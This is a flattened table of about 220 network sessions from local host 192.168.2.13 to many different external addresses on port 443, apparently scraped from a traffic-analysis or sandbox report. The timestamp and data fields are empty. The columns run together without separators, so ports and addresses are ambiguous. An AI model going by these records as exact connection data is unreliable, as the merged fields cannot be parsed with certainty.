                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19708192.168.2.1346456205.204.6.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19709192.168.2.1356754162.177.193.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19710192.168.2.1351730157.153.34.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19711192.168.2.1352458108.120.135.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19712192.168.2.1341198153.158.64.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19713192.168.2.1348790179.197.249.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19714192.168.2.1359174170.246.183.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19715192.168.2.135223664.220.198.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19716192.168.2.1360860223.52.232.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19717192.168.2.1350296216.67.40.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19718192.168.2.1344708206.45.61.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19719192.168.2.1356218134.118.101.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19720192.168.2.135082870.24.224.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19721192.168.2.136054063.119.68.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19722192.168.2.1339190126.224.255.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19723192.168.2.133996672.87.84.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19724192.168.2.1339094213.184.68.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19725192.168.2.133796060.223.14.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19726192.168.2.1332860211.13.233.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19727192.168.2.135513499.243.150.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19728192.168.2.134192886.115.34.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19729192.168.2.1348724219.193.183.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19730192.168.2.135036038.41.84.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19731192.168.2.135535492.160.250.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19732192.168.2.1341178119.248.92.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19733192.168.2.134158032.174.200.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19734192.168.2.1337758107.169.56.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19735192.168.2.134596237.58.101.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19736192.168.2.1348064106.240.201.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19737192.168.2.1344102160.2.16.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19738192.168.2.1334366200.7.41.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19739192.168.2.134539069.36.237.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19740192.168.2.13552488.80.255.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19741192.168.2.136024868.81.249.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19742192.168.2.134025481.186.128.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19743192.168.2.1339278180.98.179.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19744192.168.2.134846050.18.16.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19745192.168.2.1343650111.55.144.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19746192.168.2.135912454.181.49.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19747192.168.2.1343302165.45.57.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19748192.168.2.1357186156.127.157.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19749192.168.2.1351696220.100.243.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19750192.168.2.1359182208.237.151.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19751192.168.2.134709269.255.215.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19752192.168.2.1358116182.154.149.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19753192.168.2.1333896109.106.17.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19754192.168.2.1341862132.247.25.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19755192.168.2.1347298179.1.82.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19756192.168.2.133866818.195.85.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19757192.168.2.1333926216.220.232.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19758192.168.2.133919877.149.26.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19759192.168.2.1346926190.120.152.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19760192.168.2.1355476136.232.161.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19761192.168.2.134145481.106.192.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19762192.168.2.1335250145.18.49.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19763192.168.2.1341800119.49.171.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19764192.168.2.134147869.4.45.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19765192.168.2.135386846.73.170.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19766192.168.2.1336606145.186.95.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19767192.168.2.1336126202.228.135.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19768192.168.2.134136071.115.90.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19769192.168.2.134635675.80.169.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19770192.168.2.134974068.102.2.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19771192.168.2.1352864132.104.177.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19772192.168.2.1339904146.5.217.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19773192.168.2.1357782158.111.27.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19774192.168.2.1359754126.193.233.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19775192.168.2.1352974128.58.196.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19776192.168.2.134559089.233.156.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19777192.168.2.134780814.64.40.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19778192.168.2.1354566207.116.155.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19779192.168.2.1333250207.11.152.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19780192.168.2.1359366101.55.25.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19781192.168.2.1337700126.122.132.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19782192.168.2.1351062103.103.149.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19783192.168.2.133686293.194.122.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19784192.168.2.135882813.63.176.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19785192.168.2.1354532155.65.91.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19786192.168.2.1337696148.128.190.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19787192.168.2.133300017.166.51.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19788192.168.2.1357112115.121.123.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19789192.168.2.135213653.61.121.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19790192.168.2.1347880139.254.63.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19791192.168.2.13532568.212.147.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19792192.168.2.135034067.33.42.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19793192.168.2.1360960217.149.239.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19794192.168.2.1359136223.78.153.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19795192.168.2.1335808211.9.208.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19796192.168.2.136071658.166.189.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19797192.168.2.133919054.145.215.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19798192.168.2.1351278212.197.178.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19799192.168.2.1353230222.56.161.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19800192.168.2.1358930165.83.11.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19801192.168.2.1335658187.170.116.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19802192.168.2.133349637.151.192.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19803192.168.2.134917446.27.202.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19804192.168.2.1333556171.33.206.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19805192.168.2.1334644140.78.89.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19806192.168.2.1338414118.144.37.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19807192.168.2.1357504112.69.193.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19808192.168.2.1342432105.23.238.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19809192.168.2.1335916204.111.193.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19810192.168.2.1353058163.66.214.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19811192.168.2.1340560141.51.216.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19812192.168.2.1351906188.211.20.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19813192.168.2.1359204193.65.67.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19814192.168.2.1356398156.141.223.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19815192.168.2.1339894199.50.33.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19816192.168.2.1334448117.85.48.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19817192.168.2.135180899.31.232.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19818192.168.2.1341586185.158.185.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19819192.168.2.134540685.219.53.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19820192.168.2.133282658.141.7.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19821192.168.2.1349154170.0.211.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19822192.168.2.133312646.153.37.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19823192.168.2.1339496106.226.247.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19824192.168.2.1334200100.248.54.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19825192.168.2.135650470.56.22.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19826192.168.2.1334134191.56.25.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19827192.168.2.1348884168.135.169.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19828192.168.2.135605436.209.40.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19829192.168.2.134128063.58.225.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19830192.168.2.1349676119.232.44.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19831192.168.2.135158013.14.17.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19832192.168.2.1338532171.167.251.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19833192.168.2.1334944113.12.156.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19834192.168.2.134872445.62.101.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19835192.168.2.135987840.171.151.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19836192.168.2.1355506207.143.151.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19837192.168.2.1342938151.59.132.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19838192.168.2.133430892.203.92.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19839192.168.2.1337878165.99.203.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19840192.168.2.1344826210.72.208.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19841192.168.2.13368242.90.69.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19842192.168.2.1345184150.26.3.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19843192.168.2.134872413.51.34.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19844192.168.2.1340256118.69.9.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19845192.168.2.1339248188.142.148.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19846192.168.2.1333606158.7.39.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19847192.168.2.135069696.55.123.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19848192.168.2.1348872167.57.173.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19849192.168.2.1344330167.160.244.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19850192.168.2.133844212.85.104.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19851192.168.2.134773891.46.201.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19852192.168.2.135899694.25.16.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19853192.168.2.135690895.85.120.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19854192.168.2.1359262166.191.198.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19855192.168.2.134614238.31.146.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19856192.168.2.1338438198.119.164.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19857192.168.2.1348234111.69.58.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19858192.168.2.135421653.192.161.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19859192.168.2.1334772168.68.6.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19860192.168.2.1336994192.68.50.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19861192.168.2.1346722168.203.237.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19862192.168.2.1345420170.203.141.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19863192.168.2.1335114111.92.251.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19864192.168.2.13474421.162.113.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19865192.168.2.135025458.186.219.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19866192.168.2.1335212112.67.122.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19867192.168.2.135121640.60.148.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19868192.168.2.1353750106.181.197.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19869192.168.2.135480040.2.30.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19870192.168.2.134344650.125.225.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19871192.168.2.1359414153.225.161.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19872192.168.2.133955092.7.230.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19873192.168.2.135435882.65.241.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19874192.168.2.1333296182.129.55.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19875192.168.2.1334094133.112.89.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19876192.168.2.1360060172.86.78.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19877192.168.2.1341696222.236.45.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19878192.168.2.1354512189.171.109.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19879192.168.2.1357290138.118.103.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19880192.168.2.1345028177.46.38.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19881192.168.2.1340802155.112.110.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19882192.168.2.1357312110.5.35.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19883192.168.2.1355698133.234.44.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19884192.168.2.133910052.192.192.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19885192.168.2.1346918174.234.169.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19886192.168.2.1334040156.164.226.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19887192.168.2.1349938155.70.246.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19888192.168.2.133567047.26.102.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19889192.168.2.134106862.179.97.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19890192.168.2.1348902178.227.143.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19891192.168.2.134709224.1.211.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19892192.168.2.1345748180.233.160.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19893192.168.2.134042276.213.58.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19894192.168.2.1352740184.10.53.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19895192.168.2.1348804106.77.217.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19896192.168.2.134322054.230.200.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19897192.168.2.134781881.225.19.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19898192.168.2.1357556200.244.160.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19899192.168.2.133539492.105.166.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19900192.168.2.133546238.69.81.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19901192.168.2.1354252102.102.118.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19902192.168.2.134789212.88.112.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19903192.168.2.1336756104.28.248.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19904192.168.2.135365258.188.165.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19905192.168.2.1353738181.87.160.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19906192.168.2.1344290218.125.15.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19907192.168.2.1344486123.150.138.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19908192.168.2.1350566106.7.39.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19909192.168.2.1341708203.191.95.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19910192.168.2.1334238204.91.34.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19911192.168.2.134039057.123.0.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19912192.168.2.1341426120.82.98.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19913192.168.2.1334442169.194.151.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19914192.168.2.1349558148.204.32.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19915192.168.2.1349692169.19.152.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19916192.168.2.1354680133.39.161.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19917192.168.2.134161675.168.44.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19918192.168.2.1337020180.149.200.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19919192.168.2.133360046.182.162.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19920192.168.2.133439052.168.135.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19921192.168.2.135782844.225.224.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19922192.168.2.135333247.146.171.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19923192.168.2.1336828192.94.167.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19924192.168.2.133666451.102.98.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19925192.168.2.1359570188.61.20.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19926192.168.2.133609646.250.117.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19927192.168.2.135362076.133.96.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19928192.168.2.133463418.201.91.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
